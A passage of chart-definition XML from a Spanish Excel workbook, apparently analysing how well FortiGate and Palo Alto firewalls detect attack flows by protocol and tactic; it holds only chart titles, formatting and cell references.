          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="576736558"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="576736558"/>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Promedio Detección Eficaz Ataques LV2</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528589153"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart6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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Flujos TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FO$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FN$11:$FN$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FO$11:$FO$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="990781913"/>
        <c:axId val="284827409"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="990781913"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="284827409"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="284827409"/>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Promedio Detección Flujos TP</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990781913"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart6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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FP$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FN$11:$FN$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FP$11:$FP$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1328661657"/>
        <c:axId val="779416092"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1328661657"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="779416092"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="779416092"/>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Promedio Detección Eficaz Flujos TP</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328661657"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart6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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.030931677018633544"/>
          <c:y val="0.04799196787148595"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FQ$10</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$FN$11:$FN$30</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$FQ$11:$FQ$30</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1297845586"/>
        <c:axId val="831577072"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1297845586"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="831577072"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="831577072"/>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Promedio Detección Eficaz Ataques TP</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297845586"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart64.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1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>DENSIDAD DE ALERTAS - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DP$8</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="E06666"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DO$9:$DO$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DP$9:$DP$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="188296010"/>
        <c:axId val="361641591"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="188296010"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="361641591"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="361641591"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="22.0"/>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TOTAL ALERTAS</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88296010"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart65.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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>EFECTIVIDAD DE ALERTAS - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DS$8</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DR$9:$DR$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DS$9:$DS$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="117023085"/>
        <c:axId val="1734720541"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="117023085"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1734720541"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1734720541"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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TOTAL ALERTAS</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17023085"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart66.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1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="1F1F1F"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>RENDIMIENTO - DETECCIONES EFICACES - FORTIGATE</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FLUJOS</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DX$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DY$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>ATAQUES</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="38761D"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DX$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DZ$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="313837708"/>
        <c:axId val="333297962"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="313837708"/>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333297962"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="333297962"/>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313837708"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart67.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual FG Control de Aplicaciones</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.027583333333333335"/>
          <c:y val="0.04730458221024259"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng" w="76200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DH$49</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DJ$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr sz="2000"/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados II - '!$DH$49</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados II - '!$DI$49</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1462764525"/>
        <c:axId val="358256604"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1462764525"/>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358256604"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="358256604"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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462764525"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart68.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% DETECCIÓN PROMEDIO DE FLUJOS POR TÁCTICA - PALOALTO</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.032229729729729734"/>
          <c:y val="0.05"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="15"/>
      <c:rotY val="20"/>
      <c:depthPercent val="100"/>
      <c:rAngAx val="1"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:bar3DChart>
        <c:barDir val="bar"/>
        <c:grouping val="clustered"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$G$22</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados III -'!$H$21:$U$21</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados III -'!$H$22:$U$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="670853746"/>
        <c:axId val="1006968067"/>
      </c:bar3DChart>
      <c:catAx>
        <c:axId val="670853746"/>
        <c:scaling>
          <c:orientation val="maxMin"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>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1006968067"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1006968067"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>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Flujos con Ataque Totales Detectados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670853746"/>
        <c:crosses val="max"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart69.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
